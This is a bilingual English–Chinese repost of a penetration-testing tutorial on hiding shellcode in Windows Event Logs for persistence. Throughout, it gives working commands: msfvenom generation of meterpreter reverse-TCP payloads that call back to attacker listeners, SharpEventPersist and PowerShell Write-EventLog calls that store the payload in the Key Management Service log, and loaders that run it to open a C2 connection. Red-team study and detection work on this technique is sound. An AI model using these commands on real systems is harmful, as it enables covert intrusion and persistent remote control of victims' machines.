Windows Event logs are the main source of information for defensive security teams to identify threats and for administrators to troubleshoot errors. The logs are represented in a structured format (XML) for easy review. In windows events logs are stored related to applications, security and system. Due to the nature of the information stored it is not uncommon for sophisticated threat actors and red teams to conduct attacks against Windows Event logs that will clear the logs, stop the service or the thread in order to prevent identification of arbitrary activities.
Windows 事件日志是防御性安全团队识别威胁和管理员排查错误的主要信息源。日志以结构化格式 (XML) 表示,以便于查看。在 Windows 中,事件日志存储与应用程序、安全和系统相关。由于存储信息的性质,复杂的威胁参与者和红队对 Windows 事件日志进行攻击的情况并不少见,这些攻击将清除日志、停止服务或线程,以防止识别任意活动。
Log files are stored both in the registry and in a Windows folder and are accessible via the Event Viewer (eventvwr.exe).
日志文件存储在注册表和 Windows 文件夹中,可通过事件查看器 (eventvwr.exe) 进行访问。
%SystemRoot%\System32\Winevt\Logs\
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Typically, administrators have the permissions to write binary data and text to event logs. Execution of the following command will write a text message into the Application logs with EventID 916.
通常,管理员有权将二进制数据和文本写入事件日志。执行以下命令会将一条文本消息写入事件 ID 为 916 的应用程序日志中。
|
1
|
Write-EventLog -LogName "Application" -Source "Microsoft-Windows-User-Loader" -EventId 916 -EntryType Information -Message "Pentestlab.blog" -Category 2 -RawData 65,66,67,68 |
It is also feasible to read logs from a PowerShell console in order to confirm that the event log has been created.
也可以从 PowerShell 控制台读取日志,以确认已创建事件日志。
|
1
|
Get-EventLog -Newest 1 -LogName "Application" -Source "Microsoft-Windows-User-Loader" -Message "Provider Pentestlab*" | Format-List -Property * |
Since it is possible for an administrator to create event log entries and Windows Events are accepting binary data, it could be used as a storage of beacon during red team operations. The company Improsec developed a tool called SharpEventPersist which can be used to write shellcode into the Windows Event log in order to establish persistence. The shellcode is converted to hexadecimal value and it is written in the Key Management Service. Improsec, also released a secondary binary which acts as a loader in order to retrieve and execute the shellcode from the Windows Event Log. The following diagram displays the technique:
由于管理员可以创建事件日志条目,并且 Windows 事件正在接受二进制数据,因此它可以在红队操作期间用作信标的存储。Improsec 公司开发了一个名为 SharpEventPersist 的工具,可用于将 shellcode 写入 Windows 事件日志以建立持久性。shellcode 将转换为十六进制值,并写入密钥管理服务中。Improsec 还发布了一个辅助二进制文件,它充当加载器,以便从 Windows 事件日志中检索和执行 shellcode。下图显示了该技术:
事件日志持久性 – 图表
Havoc C2 has the capability to generate Windows Shellcode in .bin format using a combination of evasion techniques.
Havoc C2 能够使用规避技术的组合以 .bin 格式生成 Windows Shellcode。
Once the .bin shellcode is generated the file must transferred into the target host. Havoc C2 can execute .NET assemblies therefore the SharpEventPersist must be loaded into the memory of an existing implant. Execution of the command below will create an event log entry and store the shellcode.
生成 .bin shellcode 后,必须将文件传输到目标主机。Havoc C2 可以执行 .NET 程序集,因此必须将 SharpEventPersist 加载到现有植入物的内存中。执行以下命令将创建一个事件日志条目并存储 shellcode。
dotnet inline-execute /home/kali/SharpEventPersist.exe -file C:\tmp\demon.x64.bin -instanceid 1337 -source 'Persistence' -eventlog 'Key Management Service'
浩劫 – SharpEventPersist
The following image represents the Event log entry with the arbitrary code.
下图表示包含任意代码的事件日志条目。
When the SharpLoader is executed the Shellcode will run and the implant will call back to the Command and Control Framework. The SharpLoader could be set to run in an automatic manner using a different method such as using a Scheduled Task, Registry Run keys or converted the executable into a DLL in order to side-load with another legitimate binary.
当 SharpLoader 被执行时,Shellcode 将运行,植入程序将回调到命令和控制框架。可以将 SharpLoader 设置为使用不同的方法以自动方式运行,例如使用计划任务、注册表运行键或将可执行文件转换为 DLL,以便使用另一个合法二进制文件进行旁加载。
Metasploit 梅塔斯普洛伊特
Metasploit Framework has similar capabilities both in generation of shellcode in .bin format and on the execution of .NET assemblies via the execute-assembly module. The utility msfvenom can generate x64 bit shellcode.
Metasploit框架在生成.bin格式的shellcode和通过execute-assembly模块执行.NET程序集方面具有类似的功能。实用程序 msfvenom 可以生成 x64 位 shellcode。
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o beacon.bin LHOST=10.0.0.1 LPORT=2000Once the SharpEventPersist is executed an entry will appear in the Key Management Service logs.
执行 SharpEventPersist 后,密钥管理服务日志中将出现一个条目。
SharpEventPersist.exe -file beacon.bin -instanceid 1337 -source Persistence
Utilizing the execute_dotnet_assembly post exploitation module the SharpEventPersist will loaded into the memory of the process notepad.exe and an entry will appear in the Key Management Service logs.
利用execute_dotnet_assembly后开发模块,SharpEventPersist 将加载到进程记事本的内存中.exe并且密钥管理服务日志中将出现一个条目。
use post/windows/manage/execute_dotnet_assembly
持久性事件日志 – Metasploit 执行程序集
The metasploit module multi/handler must be in listening mode in order to capture the connection when the SharpEventLoader is executed.
metasploit 模块 multi/handler 必须处于侦听模式,以便在执行 SharpEventLoader 时捕获连接。
SharpEventLoader.exe
持久性事件日志 – Meterpreter
Tim Fowler developed in C# a tool which can retrieve the log entries from the Key Management Service and inject the payload into the current process. Similarly, Metasploit Framework utility msfvenom can generate the payload in hexadecimal format by executing the following:
Tim Fowler 用 C# 开发了一种工具,可以从密钥管理服务中检索日志条目,并将有效负载注入到当前进程中。同样,Metasploit 框架实用程序 msfvenom 可以通过执行以下命令以十六进制格式生成有效负载:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4444 -f hex
Metasploit 十六进制有效负载
From an elevated PowerShell session it is possible to use the shellcode in order to create a new event log entry similarly with the behavior of SharpEventPersist tool.
在提升的 PowerShell 会话中,可以使用 shellcode 创建新的事件日志条目,类似于 SharpEventPersist 工具的行为。
|
1
2
3
4
|
$payload = 'Insert Shellcode as Hex Literal String'$hashByteArray = [byte[]] ($payload -replace '..', '0x$&,' -split ',' -ne '')Write-EventLog -LogName 'Key Management Service' -Source KmsRequests -EventID 31337 -EntryType Information -Category 0 -Message 'Pentestlab' -RawData $HashByteArray.\EventLogsForRedTeams.exe |
持久性事件日志 – PowerShell
When the proof of concept tool is executed the shellcode will executed which will lead to a C2 connection.
当执行概念验证工具时,shellcode 将执行,这将导致 C2 连接。
持久性事件日志 – Meterpreter PowerShell
The beacon will be stored in hexadecimal format in the event log.
信标将以十六进制格式存储在事件日志中。
持久性事件日志 – 十六进制有效负载
References 引用
- https://github.com/improsec/SharpEventPersist
- https://github.com/roobixx/EventLogForRedTeams
- https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/
- https://medium.com/@5yx/windows-event-log-to-the-dark-side-storing-payloads-and-configurations-9c8ad92637f2
原文始发于PENETRATION TESTING LAB:Persistence – Event Log
相关文章
